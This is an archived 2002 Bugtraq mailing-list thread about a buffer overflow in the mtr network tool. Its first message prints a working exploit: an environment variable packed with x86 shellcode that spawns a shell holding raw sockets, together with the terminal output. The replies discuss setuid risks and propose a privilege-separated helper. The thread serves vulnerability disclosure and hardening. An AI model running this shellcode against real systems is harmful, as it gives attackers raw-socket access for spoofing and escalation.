linux, säkerhet

8101206 2002-03-06 15:41 +0100  /39 rader/ Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-06  17:59  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <21296>
Ärende: mtr 0.45, 0.46
------------------------------------------------------------
From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
To: bugtraq@securityfocus.com
Message-ID: <20020306154142.J31779@lagoon.freebsd.lublin.pl>

Few days ago, a new version of mtr has been released. Authors wrote
in CHANGELOG, that they fixed a non-exploitable buffer overflow.  In
fact, this vulnerability is very easly exploitable and allows
attacker to gain access to raw socket, which makes possible ip
spoofing and other malicious network activity.

The sample exploit is TRIVIAL because of strtok/while loop in
vulnerable code.

clitoris:/home/venglin/mtr-0.45> uname -smr Linux 2.4.8-26mdk i686
clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print
"A "x130
.
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
clitoris:/home/venglin/mtr-0.45> ./mtr sh-2.05$

At this point, exec'd shell has a raw socket opened:

clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
sh        17263 venglin    3u   raw                        605400 00000000:00FF->00000000:0000 st=07
sh        17263 venglin    4u   raw                        605401 00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------    2 venglin  venglin         0 Mar  6 15:40 .
dr-xr-xr-x    3 venglin  venglin         0 Mar  6 15:40 ..
lrwx------    1 venglin  venglin        64 Mar  6 15:40 0 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 1 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 2 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 3 -> socket:[605400]
lrwx------    1 venglin  venglin        64 Mar  6 15:40 4 -> socket:[605401]
lr-x------    1 venglin  venglin        64 Mar  6 15:40 5 -> /proc/17318/fd

--  * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL:
PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP:
D48684904685DF43EA93AFA13BE170BF *
(8101206) /Przemyslaw Frasunek <venglin@freebsd.lublin.pl>/(Ombruten)
Kommentar i text 8102958 av Rogier Wolff <R.E.Wolff@BitWizard.nl>
8102958 2002-03-06 18:53 +0100  /51 rader/ Rogier Wolff <R.E.Wolff@BitWizard.nl>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-07  00:20  av Brevbäraren
Extern mottagare: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <21308>
Kommentar till text 8101206 av Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Ärende: Re: mtr 0.45, 0.46
------------------------------------------------------------
From: R.E.Wolff@BitWizard.nl (Rogier Wolff)
To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Cc: bugtraq@securityfocus.com
Message-ID: <200203061753.SAA02183@cave.bitwizard.nl>

Przemyslaw Frasunek wrote:
> Few days ago, a new version of mtr has been released. Authors wrote

Ah. That's me..... :-) 

As usual, I would have preferred to have heard from you before
posting to BugTraq. 

> in CHANGELOG, that they fixed a non-exploitable buffer overflow.
> In fact, this vulnerability is very easly exploitable and allows
> attacker to gain access to raw socket, which makes possible ip spoofing
> and other malicious network activity.

Have you read the SECURITY document that comes with mtr? It explains
exactly that if you break mtr security, you will get access to the raw
socket.

If you (or your distribution) install mtr setuid, then that's the
risk you take. The mtr distribution doesn't install mtr setuid. Now,
I must confess that I do it myself too. But I know the risks I'm
taking (none: All people who have access to the setuid binary also
have the root password). I'm afraid that of course distributions will
have to make the decision for their users and will chose for
'setuid'. mtr is indeed kind of useless without that.

By the way, if you link mtr with gtk and/or curses, then I'm convinced
that you'll be able to find security bugs in those libraries which
allow you to do the same thing....

Anyway, from a security viewpoint, having access to a raw socket is
something that requires root access to get, so normally that will
actually GIVE you root access once you have it. As bugs in the
libraries that mtr links to are almost certain, mtr has root leaks as
soon as it's installed setuid.

I'm glad that the fixes predate the eploits again. :-)

			Roger. 

--  ** R.E.Wolff@BitWizard.nl ** http://www.BitWizard.nl/ **
+31-15-2137555 ** *-- BitWizard writes Linux device drivers for any
device you may have! --* * There are old pilots, and there are bold
pilots.  * There are also old, bald pilots.
(8102958) /Rogier Wolff <R.E.Wolff@BitWizard.nl>/(Ombruten)
Kommentar i text 8111323 av Matt Zimmerman <mdz@debian.org>
8111323 2002-03-07 14:58 -0500  /28 rader/ Matt Zimmerman <mdz@debian.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-08  13:48  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <21319>
Kommentar till text 8102958 av Rogier Wolff <R.E.Wolff@BitWizard.nl>
Ärende: Re: mtr 0.45, 0.46
------------------------------------------------------------
From: Matt Zimmerman <mdz@debian.org>
To: bugtraq@securityfocus.com
Message-ID: <20020307195854.GD8657@alcor.net>

On Wed, Mar 06, 2002 at 06:53:31PM +0100, Rogier Wolff wrote:

> The mtr distribution doesn't install mtr setuid. Now, I must confess that
> I do it myself too. But I know the risks I'm taking (none: All people who
> have access to the setuid binary also have the root password).

Of course, this doesn't entirely eliminate the risk of installing mtr
setuid.  It is not an uncommon situation for an attacker to gain
access to the account of one of these trusted users without gaining
immediate access to their knowledge (the root password).

Have you considered moving the raw socket functionality to a small,
auditable, setuid helper program?  mtr itself could communicate with
the helper via a simple protocol over a pipe, and that would avoid
the problem of security bugs in the UI libraries.  If the helper only
allows the minimum functionality necessary for mtr to work
(send/receive ICMP ECHO_REQUEST/ECHO_RESPONSE with a local source
address?), you could successfully restrict the damage that could be
done if the communication channel were compromised.

-- 
 - mdz
(8111323) /Matt Zimmerman <mdz@debian.org>/(Ombruten)